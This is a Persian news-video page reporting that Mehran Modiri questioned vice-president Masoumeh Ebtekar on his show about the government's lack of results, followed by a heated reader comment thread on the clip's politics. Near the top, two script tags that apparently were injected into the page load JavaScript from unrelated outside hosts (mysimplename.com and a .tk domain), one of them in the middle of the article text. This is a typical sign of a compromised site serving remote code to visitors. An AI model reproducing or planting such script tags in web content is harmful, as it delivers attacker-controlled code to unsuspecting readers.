کنایه سنگین مهران مدیری به دولت روحانی/ چرا هیچ اتفاقی در زندگی مردم نمی‌افتد؟


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>مهران مدیری در برنامه شب گذشته «دورهمی» صراحتا از معصومه ابتکار معاون رئیس‌جمهور پرسید: چرا هیچ اتفاقی در زندگی مردم نمی‌افتد؟
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
2

- 
0
ارسال در 1395/8/17 ساعت 10:50 2016-11-7 09:50:37
mohsen
توسط mohsen


عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)
 • اين ويدئو عليه دولت بود يا در حمايت از آن....؟؟!!
  من كه فكر ميكنم منطقي جواب دادن ايشون
  من اگه جاي شما بودم اينا پاك ميكردم :-)

 • با سلام! اتفاقاً ویدئوهایی از این دست هم خوب است . چرا که قضاوت بر حسب درک طیف های مختلف در افکار عمومی صورت می گیرد!
  به پاسخ خانم ابتکار خوب دقت کنید، در همۀ زمینه ها ایشان ، نتایج و ماحصل کارها را به زمان حواله می دهند!!!!!!!!!!!!!!!! این به نفع این دولت و عملکرد خودشان نیست! چون اگر مردم از عملکرد این دولت آگاه باشند که الحمدللّه هستند خواهند دانست که قراردادهای بلند مدت این دولت، عملاً دست دولت های بعدی را در بسیاری زمینه ها مثل «نفت» تا چند دورۀ انتخاباتی بسته! حواله دادن نتایج کار به زمان ساده ترین میان بر برای فرار از بازخواست شدن و مطالبه گری مردم است! از آن سو رهبر معظم انقلاب از ما انتظار مطالبه گری دارند از این سو دولت یازدهم به زمان حواله می دهند!!! و پاسخگو نیستند..........

 • به هر حال همه مثل شما تو عمق نيستند بعضي ها هم مثل من ساده انديشند!!!!

 • از ابراز این نظر در مورد این حقیر سپاسگزارم و البته خواهشمندم راجع به خود هرگز اینگونه باورمند نباشید! ابراز «برداشت اولیۀ» شما منتج به روشنگری و تبیین این موضوع شد و این جای سپاس از خداوند و شماست! پس شما تنها به برداشت اولیۀ خودتان بسنده کردید که این مذموم نیست و به اندیشه تان مربوط نشده.. حتماً که اندیشۀ حضرتعالی آنقدر وسیع است که ماحصل آن چنین نفس بی ادعا و خالصی است! که جای تبریک هم دارد.

 • حاجی شرمنده جسارت نشه ولی اگه دقیقا بگی چی میزنی ممنونت میشم

 • احتراماً ؛ «قرص» نوع دوستی، «گَرد» عشق ورزی به کرامت انسان ها، گاهی هم جهت همگامی با فطرت های پاک، در دستگاه شور و ماهور، «طنبور» !!! حالا اگه شما با ساز ما کوک نبودی یا اهل چیز دیگه ای به هر چی پاش واسادی ببخش داداش!!!!

 • :-)
  جالب جواب میدی،
  ببین این حرفایی که میزنی بد نیست ولی میدونی مشکل کجاست ؟
  موضوع اینه که این حرفا از توی این فیلم در نمیاد. این حرفا حرفای شماست نه حرف این فیلم
  شما یه سری پیش فرض داری که شاید من هم موافق اون ها باشم، بعد میای و از این فیلم هم همونا را دوباره نتیجه میگیری
  مقدم و موخر با هم نمی خونه
  یه بار خودتا بزار جای یه طرفدار دولت یا مثلا فرض کن جای این خانم یکی با دیدگاهی که شما می پسندی همین حرفا را به عنوان دفاع از خودش زده اون وقت بهتر متوجه میشی

  ولی باور کن یا دوزت بالاست یا جنست خوبه :-)
  ناراحت نشو دوز شوخی منم بالاست

 • گویا شما با اظهار نظر مخالف دولت یازدهم مشکل دارید! خوب فضای این سایت اقتضا می کنه که هر کس نظرش رو در هر باب عنوان کنه، نهایتاً هیچکس مجبور به پذیرش نظر یک کامنت نویس خاص که نیست!!! شما نظرت رو نوشتی، من هم برداشت و تحلیل خودم رو گفتم! نکته اینجاست که اگر در یک موضوع واحد اختلاف نظر داریم، می بایست به حکم اخلاق انسانی و با رعایت احترام در جدال منطقی وارد بشیم! تا منطق عقلانی در نهایت حکم صحیح رو در اذهان کاربران دیگر(که قطعاً هر کس به قدر درک و تجربۀ خود قادر به آنالیز منطقی واقعیت هست) تعیین کنه!
  با کمال تأسف شما با بیان زننده و تحقیرآمیز که به هدف کوبش نظر یک کاربر، با إلقاء یک صفت ناشایست و قراردادن فرد در یک طیف آلوده به آن صفت (با مثلاً زرنگی) ، تأیید کردید که توان مقابلۀ منطقی را در یک جدال سالم انسانی نداشته و بنابراین تحمل اظهار نظر امثال بنده را ندارید!
  اگر به ظنّ شما نظر من یک پیش فرضه، پس نباید جای ترسی برای شما از باور دیگر کاربران، حول نظر من، باشه!!!!!!!!!!!!!!!!!!! که اینگونه با هراس و توسل به هر بیان ناشایستی سعی در انحراف و سرکوبگری دارید!!!!!
  ضمناً اگر من از شوخی تو ناراحت می شدم که در قالب طنز و البته «احترام» پاسخ قبلی رو نمی دادم...اما ادب از جانب من به معنای عدم آگاهی من و دیگر کاربران از منظور توهین آمیز شما نیست که البته قضاوت با اذهان بیدار هست.....
  لازم به ذکر است که اگر من دلیلی برای طرفداری از این دولت می یافتم حتماً خودم طرفدارش می شدم ! بنابراین اصلاً نمی توانم درک منطقی از حامیان آن داشته باشم! به همین دلیل اگر شما قصد سرکوب گری ندارید بایستی بتوانید با تبیین دلایل منطقی مخالفینتان را متقاعد کنید در غیر این صورت حق ندارید با توهین و برچسب و اتهام، متعصبانه و با اصرار بر جهل خود، نظرات دیگران را سرکوب کنید!!!

  نکتۀ جالب توجه من در کامنت شما ، جایگزینی فرد مخالف در به کارگیری کلام من به نفع مخالف بود!!!!!!!!! خوب حکم این کار که از جانب هر عاقلی معلومه...! راستی حکم قانونی اش رو (علاوه بر حکم تهمت و افترا، و توهین) هم در نظر بگیری بعد دست به خط و نشون کشی بزنی بدی نیست ها!!! .......... ناراحت نشو دوز منطق من خیلی بالاست....

 • :-)
  دادش اينقدر صغري كبري نداره ها
  چندتا كامنت پاييني را هم بخوني ميتوني بدون اين حرف ها جوابتا بگيري
  حالا من نفهميدم من كجا خودم را موافق دولت اعلام كردم كه شما اين برداشت را كردي. از اين جهت ميگم كه خيلي منطقت رو بولد شده مينويسي :-)
  حرف من خيلي ساده هست. اين كليپ بيشتر به درد دفاع از دولت ميخوره
  ميترسم دوباره يه چيزي بگم بگي ....
  از پاسخ گوييت ممنون ولي فك نميكنم ادامه دادن بيشترش تفاوتي ايجاد كنه.

  :-)
  (اين شكلكه را خيلي دوسش دارم)
  :-) (آخرشم يه لبخند كوچولو)

 • دقیقا منم موافقم
  مردم ایران بسیار احساساتی هستن و به راحتی تحت تاثیر جو قرار میگیرند
  عموما نمیان چنین تحلیلی داشته باشند
  خصوصا زمانی که یک برنامه تمام آقای مدیری از خانم ابتکار داشتن به به و چه چه میگفتند
  از چه سری چه دمی عجب پایی شروع شد ، تا در مورد دور کمر آقاشون هم بهشون تبریک گفتند و از اوشون تعریفات به جا آوردند

  آخه مگه مهران مدیری کیه..؟
  تحلیل گر سیاسی..؟
  جامعه شناس..؟
  اقتصاد دان..؟

  نه ، چون کسی توی بعد تکنیکی خوب فیلم کارگردانی میکنه (نه همیشه) ، دلیل نمیشه بیایم از تحلیل و خوراک سیاسی صادر کنیم برای مردم
  اینا که ادعا دارن هنر برای هنر ، ورزش برای ورزش
  پس چرا تا ولشون کنی همیشه میچسبن به یه جناح سیاسی و شروع میکنن طرفداری از اشخاص ، صرفا برای منافع خودشون..

 • ج.م 95/8/19 ساعت 08:27

  بسیار تشکر ازصداوسیما که حرمت نگه داشت و تا اربعین برنامه های شاد دورهمی و شکراباد و هفت ترانه و...پخش نکرد واز رادیو جز مداحی چیزی پخش نشد...
  اجرتان با اباعبدالله

 • من فکر میکنم این قسمت از برنامه مهران مدیری از ابتدا تا انتها یک شوی سیاسی بود
  تماما تعریف و تمجید ، تماما کار شده بود
  حتی این به ظاهر انتقادی که انجام داد ، خودش همه جوره شرایط رو فراهم کرد تا جواب های از پیش آماده شده خانم ابتکار رو بشنویم

  واقعا واسه هنرمند این مملکت متاسفم
  این دولت یا هر دولت دیگه ای
  استفاده از تریبون عمومی و بیت المال در راه پاچه خاری و مانور سیاسی به این نحو ، لکه ننگی بر دامن هنر میذاره که به این راحتی نمیشه پاکش کرد..

 • ببخشید چراهرکس با احمدی نژاد مخالفه و اصولگرا نیست از نظر شما ضد انقلابه؟

 • در پاسخ سؤال شما: در مورد نظر شما می توان احتمالی را صرفاً از جانب عده ای معدود در جامعه ، مفروض داشت! اما تعمیم نظرتان به همه خصوصاً از باب موارد فوق الذکر کاملاً خطاست!!!!!!!
  در جایی که شما این نظر را طرح کرده اید اصلاً نام و نشانی از آقای دکتر «احمدی نژاد» یا حزب ویژه ای مثلاً «اصول گرا » به میان نیامده..!
  ضمن این که صفت «ضد انقلاب» بر کسی اتلاق می شود که بر طریق عمل ، مانع و یا علیه «پیروان انقلاب اسلامی ایران» رفتار و تلاش دارند!!